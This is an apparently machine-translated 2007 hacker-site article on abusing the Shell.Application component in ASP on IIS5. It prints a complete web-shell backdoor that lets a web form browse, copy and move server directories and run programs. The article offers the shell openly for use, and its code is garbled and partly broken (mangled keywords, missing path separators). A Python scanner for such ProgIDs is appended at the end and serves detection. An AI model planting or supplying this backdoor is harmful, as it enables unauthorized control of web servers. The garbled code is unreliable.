myhack58 | Anonymous | MYHACK58:62200717438
Oct 30, 2007 - 12:00 a.m.

Description of the shell.application object vulnerability - vulnerability warning - the black bar safety net

www.myhack58.com

Environment: tested successfully on 2K Server + IIS5 with default permissions
IIS permissions: scripts executable
Description: On 2K Server you can, by default, use the server.createobject method to use components that are already installed, such as the well-known ADO database controls. Besides these purpose-built components, there are also components that were originally provided for the system's own use, such as WSH and FSO, and they can be used in the same way. Most ASP backdoors now use them, so the methods found online disable them by deleting or changing the CLSID value of these two components in the registry, and some people uninstall them outright through "Add/Remove Programs" in the Control Panel.

The shell.application component I use here, however, is still regarded as a safe server component (or some people simply do not know about it). It can be found in MSDN under the shell object. This component has nothing to do with WSH or FSO.

What can we do with it? We can browse directories, copy and move directories, and get file sizes. We can also execute existing programs (bat, exe, hta), but we cannot pass parameters.

The conditions needed to carry these out:

  1. We must be able to upload ASP files to a directory where scripts are executable
  2. The permissions on the server's hard disk are the default Everyone Full Control
  3. This component has not been removed (needless to say)

Below is an example I wrote; let's just call it a shell backdoor. Even if it does not count as a vulnerability, I think it should count as a new backdoor.

<%response. write “<font size=6 color=red>can only execute one operation:)</font>” %>
<%response. write now()%><BR>the procedure where the physical path:
<%response. the write request. servervariables(“APPL_PHYSICAL_PATH”)%>
<html>
<title>czy’s shell. application backdoor </title>
<body>
<form action=“<%= Request. ServerVariables(“URL”) %>” method=“POST”>
<input type=text name=text value=“<%= szCMD %>”> Enter to browse the directory<br>
<input type=text name=text1 value=“<%= szCMD1 %>”>
copy
<input type=text name=text2 value=“<%= szCMD2 %>”><br>
<input type=text name=text3 value=“<%= szCMD3 %>”>
the move
<input type=text name=text4 value=“<%= szCMD4 %>”><br>
Path:<input type=text name=text5 value=“<%= szCMD5 %>”>
Program:<input type=text name=text6 value=“<%= szCMD6 %>”><br>
<input type=submit name=sb value=Send command>
</form>
</body>
</html>
<%
szCMD = Request. Form(“text”) 'directory browsing
if (szCMD <> “”) then
set shell=server. createobject(“shell. application”) 'build the shell object
set fod1=shell. namespace(szcmd)
set foditems=fod1. items
for each co in foditems
response. write “<font color=red>” & amp; co. path &“-----” & amp; co. the size & “</font><br>”
next
end if
%>

<%
szCMD1 = Request. Form(“text1”) 'directory copy, not file copy
szCMD2 = Request. Form(“text2”)
if szcmd1<>“” and szcmd2<>“” then
set shell1=server. createobject(“shell. application”) 'build the shell object
set fod1=shell1. namespace(szcmd2)

for i=len(szcmd1) to 1 step -1
if mid(szcmd1,i,1)="" then
path=left(szcmd1,i-1)
exit for
end if
next

if len(path)=2 then path=path & ""
path2=right(szcmd1,len(szcmd1)-i)
set fod2=shell1. namespace(path)
set foditem=fod2. parsename(path2)
fod1. copyhere foditem
response. write “command completed success!”
end if
%>

<%
szCMD3 = Request. Form(“text3”) 'the directory move
szCMD4 = Request. Form(“text4”)
if szcmd3<>“” and szcmd4<>“” then
set shell2=server. createobject(“shell. application”) 'build the shell object
set fod1=shell2. namespace(szcmd4)

for i=len(szcmd3) to 1 step -1
if mid(szcmd3,i,1)="" then
path=left(szcmd3,i-1)
exit for
end if
next

if len(path)=2 then path=path & “"
path2=right(szcmd3,len(szcmd3)-i)
set fod2=shell2. namespace(path)
set foditem=fod2. parsename(path2)
fod1. movehere foditem
response. write “command completed success!”
end if
%>
<%
szCMD5 = Request. Form(“text5”) 'execute the program to the specified path
szCMD6 = Request. Form(“text6”)
if szcmd5<>”" and szcmd6<>“” then
set shell3=server. createobject(“shell. application”) 'build the shell object
shell3. namespace(szcmd5). items. item(szcmd6). invokeverb
response. write “command completed success!”
end if

%>
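
A defender-side check for the pattern described above, as an added example that is not part of the original article: a Python scanner that flags ASP sources which instantiate Shell.Application (or the WSH/FSO components the article names) and call the folder members the script relies on. The function names, verdict labels and sample snippets are constructed for illustration.

```python
import re

# ProgIDs the article names as reachable from ASP through server.createobject.
RISKY_PROGIDS = ("shell.application", "wscript.shell",
                 "scripting.filesystemobject")

# CreateObject("ProgID"), tolerant of case and spacing.
CREATE_RE = re.compile(r'createobject\s*\(\s*"([^"]+)"\s*\)', re.I)
# Declarative form: <object runat="server" progid="ProgID">.
OBJECT_RE = re.compile(r'<object\b[^>]*\bprogid\s*=\s*["\']?([\w.]+)', re.I)
# Shell.Application folder members used by the script in the article.
MEMBER_RE = re.compile(
    r'\.\s*(namespace|parsename|copyhere|movehere|invokeverb)\b', re.I)

def scan_asp(text):
    """Return (line_no, kind, detail) findings for one ASP source text."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for rx in (CREATE_RE, OBJECT_RE):
            for m in rx.finditer(line):
                progid = m.group(1).strip().lower()
                # A trailing version suffix (ProgID.N) is matched as well.
                if any(progid == p or progid.startswith(p + ".")
                       for p in RISKY_PROGIDS):
                    findings.append((no, "progid", progid))
        for m in MEMBER_RE.finditer(line):
            findings.append((no, "member", m.group(1).lower()))
    return findings

def verdict(findings):
    """'high' when Shell.Application is created and a folder member is called."""
    shell = any(k == "progid" and d.startswith("shell.application")
                for _, k, d in findings)
    member = any(k == "member" for _, k, _ in findings)
    return "high" if shell and member else "review" if findings else "clean"

# Constructed sample inputs (not taken from a real server).
SAMPLE_SUSPECT = '''<%
Set sh = Server.CreateObject( "Shell.Application" )
Set fod = sh.NameSpace(p)
fod.CopyHere item
%>'''
SAMPLE_BENIGN = '''<%
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open dsn
%>'''
```

Run it over every file in directories where IIS allows script execution, and treat a "review" result as a prompt to check whether the page legitimately needs that component.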